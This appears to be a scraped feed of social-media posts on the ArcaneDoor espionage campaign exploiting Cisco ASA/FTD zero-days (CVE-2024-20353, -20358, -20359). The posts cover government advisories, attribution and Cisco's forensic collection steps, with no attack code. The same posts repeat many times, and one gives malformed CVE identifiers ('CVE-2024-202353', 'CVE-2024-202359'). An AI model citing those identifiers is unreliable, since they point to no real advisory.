- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
Patching is not a fix!
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Cisco has released free software updates that address the vulnerability described in this advisory.
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities
Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory
Issue Summary
The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.
Technical Key Findings
CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.
Vulnerable Products
Impact Assessment
Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.
Patches or Workaround
Cisco has released free software updates that address the vulnerability described in this advisory.
Tags
#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##ArcaneDoor Attack (CVE-2024-20353 and CVE-2024-20359) https://fortiguard.fortinet.com/threat-signal-report/5429
##Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/ #government-backedattacks #securityupdate #Don'tmiss #Microsoft #Hotstuff #firewall #0-day #Cisco #Lumen #News #CISA #NCSC
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##Multiple government agencies has published an advisory on an ongoing APT campaign targeting Cisco ASA / FTD devices using post-auth RCE bug CVE-2024-20359 and CVE-2024-20358.
They don't know how the attackers initially got in.
Important note from the research published by Cisco Talos calling the APT operation* "ArcaneDoor":
> We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date. Our investigation is ongoing, and we will provide updates, if necessary, in the security advisories or on this blog.
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
##@GossiTheDog Here are the CVE security advisories:
🚨🚨 two zero days in Cisco ASA AnyConnect under exploitation since last year
CVE-2024-20353 and CVE-2024-20359
##Wake up babe, new Cisco actively exploited zero days just dropped:
Cisco has confirmed that this vulnerability has been exploited. Cisco strongly recommends that customers upgrade to fixed software to resolve this vulnerability. Customers are also strongly encouraged to monitor system logs for indicators of undocumented configuration changes, unscheduled reboots, and any anomalous credential activity.
See official Cisco Event Response: Attacks Against Cisco Firewall Platforms h/t @ciaranmak
See related Cisco Talos Intelligence blog post ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices for indicators of compromise and additional info h/t @mttaggart
Both CVEs are added to the Known Exploited Vulnerabilities (KEV) Catalog!! https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
EDIT 1510 EST: The Canadian Centre for Cyber Security has a security advisory with additional indicators of compromise: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
EDIT 1640 ET: NCSC-UK released specific malware analysis reports for:
cc: @todb @briankrebs @campuscodi @jwarminsky @jgreig
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #KnownExploitedVulnerabilitiesCatalog #CISA #UAT4356 #threatintel #IOC
##updated 2024-04-26T15:22:27.803000
52 posts
2 repos
Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV
##So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:
"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."
This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.
What you should do is (I'll quote):
- Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support
diagnostic-cli
command.- Use the
enable
command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.- Collect the outputs of the following commands:
show version
verify /SHA-512 system:memory/text
debug menu memory 8
- Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.
Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.
I will repeat (without shouting this time):
"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."
There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.
#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity
Final question for anyone still reading: why the debug menu memory 8
? What does it do?
I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:
cc: @todb @campuscodi @mttaggart @DaveMWilburn
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356
##The #Cisco vulns today smack a little of the Barracuda ones last year.
I really hope we don't end at "Toss these ASAs into a volcano."
#CVE_2024_20353 #CVE_2024_20359
@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.
#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel
##The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.
It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.
#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw
##The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.
As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.
www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns
#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353
Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.
If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.
blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/
#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359
Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs
